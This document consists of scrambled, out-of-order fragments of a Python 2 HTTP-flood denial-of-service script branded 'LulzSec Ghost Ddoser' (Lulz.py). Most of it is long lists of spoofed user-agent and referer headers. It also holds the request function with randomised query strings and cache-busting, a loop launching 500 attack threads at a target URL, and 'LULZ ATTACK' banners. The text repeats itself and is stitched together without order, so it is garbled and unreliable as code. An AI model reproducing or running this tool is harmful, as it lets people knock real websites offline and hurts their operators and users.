headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=')", "(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0", ".NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')", "headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider", "5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows", "like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3", "~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0", "urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache')", "Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT')", "3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)')", "url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in", "\\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\", "4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android", "Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE", "Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64)", "U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux;", "Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en]", "_// _// ~ _// ~ ~ / / / / / / /", "headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260", "headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l;", "3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url +", "CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET", "(Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1", "2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible;", "U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2", "(compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv", "host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val):", "http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10')", "headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML,", "balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good", "(.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows", "headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')", "(v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)')", "+(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com;", "Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL", "v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251", "AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0", "6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at", "GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema')", "headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp;", "out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print", ",\\ / \\: `:\\ \\ // `:`. ,' \\ /-._; | : :", "Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", "headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search", "http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP", "(code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and", "Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0", "return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if", "http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d')", "headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS", ".---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ /", "like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0)", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)')", "U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet;", "headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0", "in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage():", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size):", "1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')", "-lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage()", "Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')", "Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML,", "1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )')", "\\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\;", "Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb", ".NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1;", "obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)')", "Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self):", "print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The", "http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona", "intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev;", "CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0", "(libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus", "AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger", "Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02", "'' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a)", "Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;')", "by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')", "headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML,", "U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1')", "headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc')", "NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url)", "1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com", "2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR", "\\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_. O ._O", "Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2')", "(aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')", "Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0", "com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE-", "chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost", "(Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4;", "| \\ \\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)')", "headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net", "`.`.) _,' |;._:: | | | | `| : `' ,' `. /", "headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0", "v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot", "headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1", "4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)')", "crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0')", "headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )')", "bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK", "Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36", "url) host = m.group(1) for i in range(500): t = HTTPThread() t.start() t", "A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us;", "a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup')", "Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0", "en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru)", "(PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101", "6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;", "tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19", "search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x')", "CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML", "Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da", "random ascii string def buildblock(size): out_str = '' for i in range(0, size):", "Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)')", "U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16')", "| / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | |", "headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet", "thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1):", "libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0')", "/ :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / '", "sys import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[]", "- obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot", "V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)')", ",' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _//", "headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X')", "| \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\:", "= random.randint(65, 90) out_str += 